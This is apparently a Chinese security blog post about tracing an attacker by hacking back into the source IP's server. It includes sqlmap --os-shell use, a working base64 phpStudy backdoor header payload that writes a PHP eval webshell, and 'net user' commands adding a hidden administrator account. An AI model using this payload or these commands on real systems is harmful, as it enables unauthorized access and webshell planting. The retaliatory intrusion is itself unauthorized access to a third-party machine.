记一次普通的攻击溯源排查

朋友们现在只对常读和星标的公众号才展示大图推送，建议大家把夜组安全“设为星标”，否则可能就看不到了啦！

攻击溯源

攻击源IP反制

一来就看游戏入口去了，一个游戏页面，简单抓了包

存在用户，但没啥关系，存在sql注入，查看了库，只有test库（/不对劲，交互连接的库名不是这个），但不能查询内容。

–os-shell一把嗦。

权限不够，权限不足，–file-read啥的也是没权限直接过。
于此同时目录也早扫完了，查看了一下，看到早就已经被挂了马了，肉鸡没跑了。

查看了下漏扫结果，存在phpstudy后门，才反应过来本来就是肉鸡，一个劲对外扫phpstudy后门，黑页的游戏也是phpstudy部署的，本身就有后门

顺其自然通过Phpstudy后门写文件获取shell

手工直接请求头添加下面payload即可，同时删除原本的Accept-Encoding改成下面的，//开始忘删了导致没生效，蠢死。

Accept-Encoding: gzip,deflateAccept-Charset: c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInVwZGF0ZSJdKT9ePj5DOlxMVF9TZXJ2ZXJccGhwU3R1ZHlcV1dXXHVwZGF0ZTF0ZXN0LnBocCcpOw==

攻击源IP服务器分析

其中查看数据发现系统存在可见内最早的webshell为2019-10-15日,文件名为test.php(不确定是否为文件真正上传建立的日期)

以及2022-10-10 01:28创建的webshell，文件名称为phpshell.php，同时期上传的cs马

但该攻击者未进行其他的相关操作，仅获取服务器权限后看了一下，未发现其他操作。
于此同时，发现被添加的影子账户loxxxxo$,并且在这个影子账户的桌面上传了phpstudy的批量扫描后门利用工具，以及一些扫描记录和扫描的目标网段

通过创建影子账户登录服务器，本身就开了3389，就不用再开启端口了

net user xxx /add  //添加管理员账户net localgroup administrators xxx /add  //将添加的管理员账户加入管理员组

利用工具的一些扫描记录

同时该影子用户还上传了一些黑灰产软件，运行挂起获取收益

一个月内获得的积分收益

攻击源IP loxxxxo影子用户分析

通过查看服务器端口连接情况发现与该服务器3389远程连接有一个IP 175.xxx.xxx.138（上海 腾讯云），极大可能也为肉鸡。

同时查看当前服务器在线用户，该影子用户loxxxxo$处于连接在线状态，也就是说上述的175.xxx.xxx.138的腾讯云服务器即为该影子用户的远程连接主机。

通过信息查看loxxxxo$用户创建时间为2022年9月20日（不排除为后续修改密码后的时间）（因此说明10号上传的webshell的攻击者与该用户不为同一人）。

简述该用户信息
1、影子用户：loxxxxo$
2、远程连接主机：175.xxx.xxx.138（上海 腾讯云）
3、9月20日甚至跟早入侵该攻击源IP并作为跳板对外扫描Phpstudy后门，同时利用入侵主机部署黑灰产软件获益。
4、其中一个黑灰产软件使用的他的会员号：AG-xxx

后续思路

1、针对175.xxx.xxx.138攻击主机，简单看了一下，开了80端口 但没什么应用部署，也没查到相关威胁情报信息，极大可能也为跳板机。
2、针对黑灰产软件上的会员号信息，涉及到网站jingxxx.taxxx.com，意思得获取这个网站权限在查相关用户信息，工作量较大，仅思考了下。

总结事件线

该源IP被很早入侵并使用phpstudy部署了几套web游戏系统——>真实攻击者持有IP175.xx.xx.138通过phpstudy后门扫到该服务器存在后门，并通过后门获取服务器权限，同时创建了影子账户loxxxxo$——>该用户上传黑灰产软件运行挂机收益，同时定期使用Phpstudy批量扫描工具对全网扫描——>10月10日凌晨扫描至单位业务系统服务器触发告警。

记一次平平无奇有手就行的幸运域控

原文始发于微信公众号（夜组安全）：记一次普通的攻击溯源排查